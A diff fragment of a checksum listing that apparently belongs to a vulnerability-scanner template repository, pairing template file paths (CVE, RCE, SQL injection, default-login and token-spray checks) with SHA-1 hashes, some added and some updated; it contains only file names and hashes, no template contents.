-http/token-spray/api-openai.yaml:9d86191e26bae37c68d5986d46e1ee613b81eb7c
+http/token-spray/api-openai.yaml:98b146f8013df819687095a1bc26f045513d373e
 http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151
 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7
 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a
@@ -7208,8 +7222,9 @@ http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190
 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640
 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f
 http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975
+http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:85cd22dc109529bd4a93f0d18672d93221befc04
 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522
-http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:1ab8db1b41bfc5e613f4fbe99f417739d332eb31
+http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41
 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283
 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9
 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc
@@ -7514,6 +7529,7 @@ http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:834c86504e945da05e4a3c818
 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:0748e078a3e4d2b1c2665ee271393df76f2b50c4
 http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:3bf657199eaa62538621ae0b76b611ecdafe7d83
 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:1ffe1e3009245779da07ca87f610f0efc35c174e
+http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:2e2099e6cd39c30a2b7f8096d5e65340142e009b
 http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:ba49da8c71e4e9b1ba7fd6c86e259418262a38db
 http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:4585fe5be1b00ae9d8546f4e3bf86b588f1ea186
 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:87bb7c0da6d60ee728ce4892ced883dbb9e4ba9d
@@ -7553,22 +7569,22 @@ javascript/enumeration/ssh-weak-public-key.yaml:9e738e8f39deeeb040854aeb4bd2dda8
 javascript/enumeration/ssh-weakkey-exchange-algo.yaml:26eb4bd167a61949c6a9d579a0b02d46056e0b3c
 network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44
 network/cves/2001/CVE-2001-1473.yaml:792d2fb301e5a5fa6c1274a7ec98cc825e4ad31a
-network/cves/2011/CVE-2011-2523.yaml:d9f97cc4c00623b86120437033272c5f867f5856
-network/cves/2015/CVE-2015-3306.yaml:91d49031049de015a8583d4884d191db26c3e455
-network/cves/2016/CVE-2016-2004.yaml:2e49331fd8fdcdcd1324c2e1bea269c2a7fdb78c
-network/cves/2016/CVE-2016-3510.yaml:07a133e8f3bd19ec67dd0f723595b3a915f6ed70
-network/cves/2017/CVE-2017-3881.yaml:cdcbf69a5818408c46f15050ff10b4db4ad28c09
-network/cves/2017/CVE-2017-5645.yaml:3ea00e77331d836b6b649796d9989e38e8655ecf
-network/cves/2018/CVE-2018-2628.yaml:be8b84f0cd31611674d7e4139bf5ca74a44aa875
-network/cves/2018/CVE-2018-2893.yaml:b32a5f2a041c70ade8b6f0b951925cb79e48e965
-network/cves/2020/CVE-2020-11981.yaml:7d4fa82938ea4c0f3bc7678a1a91577280dd136d
-network/cves/2020/CVE-2020-1938.yaml:797c518e180d8cf581c37c9fc8be8b2a820094b9
-network/cves/2020/CVE-2020-7247.yaml:8c4d9f68149de1747d403340b639460de856f7eb
-network/cves/2021/CVE-2021-44521.yaml:98c0ae75aaaf785fdc3fb6952027b509959571b5
-network/cves/2022/CVE-2022-0543.yaml:583b1a90b1631ab1121679302244a906df3cb4a7
-network/cves/2022/CVE-2022-24706.yaml:08da1318dcc5afcbbb1d1b5bb4297187a7666f5e
-network/cves/2022/CVE-2022-31793.yaml:6243af1a94df38e62047fa66c86f9aec68b16968
-network/cves/2023/CVE-2023-33246.yaml:28332ee6138694c0472a08cd9b271de51dd32dbd
+network/cves/2011/CVE-2011-2523.yaml:5faa7da6447727cf75dc5bd02575579dfb9ba6cb
+network/cves/2015/CVE-2015-3306.yaml:e4aed504f414b657f5292cfb75db068e391530cd
+network/cves/2016/CVE-2016-2004.yaml:ea578b492acb943ce0b8dac1c9c752b035c6f13b
+network/cves/2016/CVE-2016-3510.yaml:d8d69d16f6afc388bfa0f6d065911f1bbb83c1b9
+network/cves/2017/CVE-2017-3881.yaml:f0c81eb6ce7a4475d90ae6f99710278b8ab23bf4
+network/cves/2017/CVE-2017-5645.yaml:caddb604c2472173206909c27dd13625b1859305
+network/cves/2018/CVE-2018-2628.yaml:a04f80971409772076638dde77e9da75b6ef31b8
+network/cves/2018/CVE-2018-2893.yaml:6a71a1b60c13e8d12f7f4f558b9b0e568168a313
+network/cves/2020/CVE-2020-11981.yaml:0aef729b93969f3ba807abd098eba54447ee9550
+network/cves/2020/CVE-2020-1938.yaml:f46203c54a3afc9737db739e0458c71a8f7daf76
+network/cves/2020/CVE-2020-7247.yaml:de87cd533820250fe1e8c40fc6499fd1b9d01e00
+network/cves/2021/CVE-2021-44521.yaml:f7a71484160a4c642c7de89532faa90f8197bd9a
+network/cves/2022/CVE-2022-0543.yaml:e9859038895a62b5bb1e60ed5c400d9b0e0940c1
+network/cves/2022/CVE-2022-24706.yaml:558b9f30d43c93982b35a0a01bb1e3eb8d17fe47
+network/cves/2022/CVE-2022-31793.yaml:44734dfe444240fe29eee0b67e46da54a488de03
+network/cves/2023/CVE-2023-33246.yaml:dd5addc8188363be41ecfdc2e11d67d15a599f65
 network/default-login/ftp-anonymous-login.yaml:da3402a791529b5521e14fceafe0f0084bb4c9d2
 network/default-login/ftp-weak-credentials.yaml:1405ce162895ba2dcdaa7277e687a28a2ff40ce7
 network/default-login/ldap-anonymous-login.yaml:f75251d3c4314afca801d218fa7a5bc91ca60f8c
@@ -7672,6 +7688,7 @@ network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3
 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619
 network/misconfig/dropbear-weakalgo.yaml:6c7daef01b97062533ba41e8c242ef9fc8a546bd
 network/misconfig/dropbear-weakmac.yaml:afc50bf81ebe0d85bb0f2a2be9be8ae8df3fc7de
+network/misconfig/erlang-daemon.yaml:1c664e6bf9753f30722dc1b55a795c0ecb9c08f7
 network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b
 network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109
 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a
@@ -7709,7 +7726,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4
-templates-checksum.txt:42fd128a2bf9803063b17dfe3796e7c460f14fa4
+templates-checksum.txt:7d5b84823ca2785f8a269b78baffa84db7f94445
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4